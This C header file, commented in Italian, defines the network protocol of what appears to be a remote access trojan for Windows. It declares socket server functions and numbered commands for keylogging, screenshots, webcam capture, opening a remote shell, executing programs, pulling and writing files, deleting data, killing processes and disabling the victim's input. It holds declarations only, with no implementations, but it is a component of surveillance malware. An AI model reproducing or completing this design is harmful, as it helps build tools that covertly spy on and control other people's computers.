/* ServerProtocol.h
Il seguente modulo contiene le funzioni che gestiscono le connessioni di rete
e le specifiche di comunicazione tra client-server

	OpenServer(int iPort) -> Apre il server su una porta e ritorna un riferimento al socket
	WaitForClientConnection(SOCKET s); -> Ritorna un oggetto SOCKET alla prima connessione di un client
	RecvFrom(SOCKET s, char *pBuffer); -> Funzione per ricevere un messaggio dalla socket
	SendTo(SOCKET s, char *pText); -> Funzione per inviare un messaggio alla socket  
	GetToken(char *pRecvBuf, int iTokenNumber); -> Funzione per prendere una parte del comando ricevuto dal server 
	GetCommand(char *pRecvBuf); -> Funzione per identificare il tipo di comando ricevuto
	SendCommandNotify(SOCKET s, char *pCommand); -> Funzione che ritorna l'OK alla socket del client per notificare l'avvenuta esecuzione di un comando
	TokensCount(char *pString); -> Funzione che conta i token di una stringa in base al separatore
*/
#ifndef SERVERPROTOCOL_H
#define SERVERPROTOCOL_H

#define SERVER_SOCKET_ERROR 1
#define SERVER_SOCKET_OK 0
#define BUFFER_LENGTH 256
#define BLOCK_LENGTH 4096
#define SEPARATOR '-'

/* Inizio costanti dei comandi */
//#define KEYLOGGERHEADER '@'
#define OKCOMMAND "+OK"
#define NOCOMMAND "+NO: Bad Argument List"
#define OPENCDDRIVE "101"
#define CLOSECDDRIVE "102"
#define REBOOT "103"
#define SHUTDOWN "104"
#define STARTKEYLOGGER "105"
#define STOPKEYLOGGER "106"
#define SETCURSORPOS "107"
#define SHOWMESSAGEBOX "108"
#define GETDRIVESENUM "109"
#define GETDIRSCONTENT "110"
#define GETREMOTEFILE "111"
#define CLOSESERVER "112"
#define OPENSHELL "113"
#define RENAMEFILE "114"
#define DELETEFILE "115"
#define DELETEDIRECTORY "116"
#define ENUMPROCESS "117"
#define ACTIVEMATRIX "118"
#define SHOWMATRIXTEXT "119"
#define DEACTIVEMATRIX "120"
#define SAVETOREMOTEFILE "121"
#define DISABLEINPUT "122"
#define ENABLEINPUT "123"
#define EXECUTE "124"
#define GETSCREENSHOT "125"
#define GETWEBCAMPIC "126"
#define DIGITSTRING "127"
#define KILLPROCESS "128"
#define SENDKEYLOG "129"


/* Fine costanti dei comandi */

#include <winsock2.h>
#include <windows.h>
#include <string.h>
#include <fstream.h>


SOCKET OpenServer(int iPort);
SOCKET WaitForClientConnection(SOCKET s);
SOCKET InitClientSocket(char *pHost, int iPort);

char *GetToken(char *pRecvBuf, int iTokenNumber);
int TokensCount(char *pString);
char *GetCommand(char *pRecvBuf);
void SendCommandNotify(SOCKET s, char *pCommand, bool Success = true);

int RecvFrom(SOCKET s, char *pBuffer);
int SendTo(SOCKET s, char *pText);



#endif


